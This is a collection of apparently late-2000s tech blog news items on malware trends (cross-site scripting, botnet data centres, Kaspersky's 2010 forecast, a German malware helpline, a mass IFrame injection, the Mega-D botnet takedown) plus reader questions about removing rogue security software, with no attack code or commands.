We all know that the increasing sophistication of technology opens up literally dozens of new opportunities for those wanting to inflict harm on that technology’s users. The Internet is, if anything, an object lesson for this truism. Once the Internet became mainstream, so to did viruses, spybots, DOS attacks, and all the other nastiness we collectively refer to as malware. One long term weaknesses in the security armor of the Internet is cross-site scripting (XSS). For the better part of a decade it has for Internet users left a door wide open to an unwanted destructive potential.
Michael Sutton, the vice president of security research at Zscaler, says that XSS typically needs a user to click a link, such as those that appear in spam or phishing efforts, which then strikes back at the user. But, he continues, XSS is becoming more sophisticated. Rather than being limited to a user-web site interaction, Sutton says that XSS efforts can now work within a web platform, such as a social networking environment, spreading itself readily among all users in the social network’s ecosystem.
Sutton also says that such sophisticated attacks, so far, have been by “[b]ored and bright individuals...tinkering with the concept”, and that “true criminals wait on the sidelines ready to move in when traditional techniques fail to achieve desired goals.” Translation: another malware threat to be concerned about. Not today, perhaps, but definitely tomorrow.
Solutions aren’t all that difficult. Users could quit doing stupid things. For instance, if you don’t know where an email originated, don’t click the link it contains. But, let’s face it, there’ll always be one or two of us who do it anyway. Which means that another level of protection is needed. Sutton says that’s got to be developers--they need to be more vigilant about writing into code the necessary protections for web programs, such as Microsoft has done with Internet Explorer 8.
Traditionally, the lowlifes running botnets have made due with shared hosting provided by shady ISPs. As these crimes become higher profile, enforcement has stepped up resulting in many of these ISPs going offline. To address this dilemma it looks like some purveyors of malware have started buying their own data centers.
It’s actually depressingly easy to do. The people running a botnet need only acquire a block of IP addresses from one of the Regional Internet Registries (RIR) or Local Internet Registries (LIR). These regulatory bodies are only supposed to be handing out IP blocks to large companies, ISPs, and telecoms. Turns out the RIRs aren’t doing their due diligence in investigating applications. Once the bad guys get the IP addresses, they buy some servers in a data center, and they become their own ISP.
This effectively takes away the best point of attack for authorities. “If there's a problem, who are you going to talk to? It's a different ball game now. These guys are buying their own data centers. These LIRs and RIRs aren't going to push back if you say you need a /24 or /16. They're not the Internet police," said Alex Lanstein of FireEye Research. The process is becoming common is places like Europe and the Caribbean. What’s worse, getting the IP addresses back can take a lot of time and effort. The procedures just don’t exist. The solution? Well, there isn’t one right now, but if you have an idea, we’d love to hear it in the comments.
Cybercriminals have a lot in common with the Periplaneta americana, the common household cockroach. They seek out the dark, poking and prodding for ways to get in where they are unwanted. In their case it isn’t food, but the misery of computer users they seek out. And, just like cockroaches, once you think you’ve got them blocked, they find a new way in.
Kaspersky Labs’ Cyberthreat Forecast for 2010 says that IT managers and users are becoming more savvy, making fake programs, gaming Trojans, or web sites less useful for cybercriminals. Instead, it looks like they’ll be focusing their attention on P2P networks, botnets, and mobile platforms.
P2P networks will be used to support malware attacks. According to Kaspersky: “This method has been used to spread notorious threats such as TDSS and Virut as well as the first backdoor for Mac OS X. In 2010, we expect to see a significant increase in these types of incidents on P2P networks.”
Mobile platforms, iPhone and Android, will also be more frequently targeted. Kaspersky suspects that iPhone users, without compromised handsets, will be okay, but that Android users might be in for some pain: “The increasing popularity of mobile phones running the Android OS combined with a lack of effective checks to ensure third-party software applications are secure, will lead to a number of high-profile malware outbreaks.”
As for botnets, Kaspersky sees them as offering profitable possibilities by manipulating Internet traffic: “In the future, we foresee the emergence of more "grey" schemes in the botnet services market. These so-called "partner programs" enable botnet owners to make a profit from activities such as sending spam, performing denial of service (DoS) attacks or distributing malware without committing an explicit crime.”
Lastly, Kaspersky sees Google Wave as a potential target for 2010. It’s new. It’s untested. And therefore it’s vulnerable. Kaspersky says: “Attacks on this new Google service will no doubt follow the usual pattern: first, the sending of spam, followed by phishing attacks, then the exploiting of vulnerabilities and the spreading of malware.”
Malware is no easy thing to get rid of--bandwidth-hogging botnets in particular. One small chink in Internet security armor is all it takes for malware to thrive. Recognizing that no one entity can combat malware alone, the German Federal Office for Information Security (BSI), the Association of the German Internet Industry (eco), and German Internet service providers (ISPs) have come together to establish a malware clean-up helpline for Germany.
The three groups will work together to identify malware and remove it from the system. ISPs will be on the frontline, hunting down infected computers. ISPs will inform the owner of a machine suspected of infection, and direct her to a website with information on how to cleanse her computer. If the website’s advice doesn’t resolve the problem, the computer owner will be directed to a call center where realtime help will be available.
Germany’s need for the service is a great one indeed. Germany ranks third on the international scale for the number of infected computers. This new venture, according to eco, has raised safety awareness among German computer users. With the addition of professional support to remove malware, eco hopes to see Germany out of the top ten.
As if there weren't already enough infected websites floating around in cyberspace, security researchers are warning of a new mass injection attack that has already compromised more than 130,000 Internet destinations since the attacks first began in late November.
Researchers say the nasty code is a rogue IFrame being used to exploit visitors and inject their PCs with a banking trojan.
"The injected IFrame loads the first stage of malicious content from 318x.com. A series of IFrames and code redirections (invisible to the user) then ensues, culminating in a rather curious methoed for managing the final payload," explains mary Landesman, serior security researcher at Web security company ScanSafe, now part of Cisco.
Landesman says the redirects are used to determine the potential victim's web browser, Flash Player version, and other details. Using that information, only exploits relevant to that person's setup are used.
McAfee used its SiteAdvisor technology to crawl the web and test domains for security threats--a total of 27 million domains in all. Overall, McAfee reports that 5.8% of them were a problem. The percentage of risky sites is up over 2007 and 2008, but, McAfee says, because of a change in methodology it’s not possible to say the Internet has become more risky.
The places to avoid? By Top Level Domain (TLD) they are .CM (Cameroon), with a risk factor of 36.7%, .COM (Commercial), 32.3%, .CN (People’s Republic of China), 23.4%, .WS (Samoa), 17.8%, and .INFO (Information), 15.8%. For downloads the worst place to be is .RO (Romania).
The safest places to play on the Internet (and perhaps the least interesting), are .GOV (Government), .JP (Japan), .EDU (Education), .IE (Ireland), and .HR (Croatia).
The Untied States sits toward the top of the risky list, ranked 17th, with a risk ratio of 3.1%.
McAfee also says the likelihood of receiving spam if registering with an email address has dropped from 7.6% to 2.8%. And the percent of sites delivering viruses, spyware or adware has edged down, from 4.7% to 4.5%. (McAfee cautions that this last finding doesn’t mean there are fewer Potentially Unwanted Programs (PUPs) in the tubes, but rather they are getting harder to detect using standard procedures.)
Overall, sites registered in the Americas, Europe, the Middle East, and Africa are relatively safe. Sites registered in the Asia-Pacific region are not.
For those of us who download applications, programs, extensions, or really anything off the Internet in great frequency, what's the best way to keep a computer completely protected from external threats? I'm talking about locking down your system tighter than a Supermax prison--not impacting your ability to carry out your everyday tasks, rather, making sure that you're protected from attack at your PC's primary entry points.
That's exactly what I'll be exploring in this week's freeware roundup: The five best free applications for keeping your computer as secure as can be. If you aren't running some combination of these freeware and open-source apps, well, you only have yourself to blame if your system gets infected with something unpleasant!
According to Faulhaber, who relied on information gathered by Microsoft’s Malicious Software Removal Tool (MSRC), during the first half of 2009 64-bit XP was 48 percent less likely to be infected, while 64-bit Vista was 35% less likely to be infected. No information was available for Windows 7 for the obvious reason it hadn’t yet been released, but it is expected the same would hold true for it. Faulhaber suggests the reason 64-bit versions are more secure is that malware, written mostly for the 32-bit world, is confused by 64-bit.
Not so fast, chicken Marengo! Alfred Hunger, vice president of engineering at the security firm Immunet, and formerly of Symantec, says there’s plenty of 64-bit malware out there. In fact, its a pretty easy thing for malware creates to whip up 64-bit versions if and when they desire. The low levels of 64-bit infection, he says, is more due to the low levels of 64-bit penetration in the market. If there aren’t all that many people using it there’s no incentive for malware makers to pay attention.
Microsoft’s own bi-annual Security Intelligence Report offers up another possibility: 64-bit users are smarter than 32-bit users. Being technologically more savvy they are less likely to bring malware onto their machines. The report concludes that as 64-bit spreads from the provenance of techno-geeks the current difference in infection rates between 32-bit and 64-bit will evaporate.
Security firm FireEye has reportedly struck a massive blow against spam. The so called “Mega-D” or “Ozdok” spam botnet was effectively dismantled by these intrepid security researchers. After studying the beast, FireEye launched an attack by notifying ISPs, having command and control (CnC) domains removed, and then registering unused CnC domains.
Almost immediately, the spam ceased. No small feat, considering Ozdok was probably responsible for one third of the world’s spam. This takes the load off ISPs which were forced to filter the spam from this botnet. Individual users probably won’t notice much difference.
FireEye found that over 246,000 zombie machines were reporting to the CnC domains in their possession after the takedown. The security firm plans to work with ISPs to indentify the owners of the PCs so they may remove the malicious software.
PC MightyMax 2009 was included with the purchase of my new HP a6827c with Windows Vista. After trying out MightyMax I decided I didn’t want it due to its obscene costs. I obtained the instructions for removal—go to the Start menu, go to the PC MightyMax folder, and hit the uninstall button, but the software does not fully uninstall. Help! —Shannon Swank
Doctor, I managed to get two computers infected with AntiVirus2009, simply by following a link to a video review online. Both machines run Windows XP Professional SP3. One is a Dell Vostro laptop, the other is a desktop I built about three years ago.
I’ve run Malwarebytes’ Anti-Malware, which removed a bunch of copies, Rogue Remover, SuperAntiSpyware, ThreatFire, and ZoneAlarm Internet Security, but every so often a new browser window will suddenly open and try to access AntiVirus2009.com. I’ve looked at every website on the Internet (well almost) and nothing I’ve tried will get rid of it on either computer. The only way I’ve been able to keep using the computers is to manually block antivirus200*.* in ZoneAlarm. Every time I check the log, there’s entry after entry where it tried to send an ICMP ping to that website or tried to open Firefox to access it. I’m at the end of my rope. I don’t know what else to do and I’m sure that there are other people out there having much the same problem as I am. Is my only hope to re-install Windows? —Steve Rugg
Read our advice for both Shannon and Steve after the jump.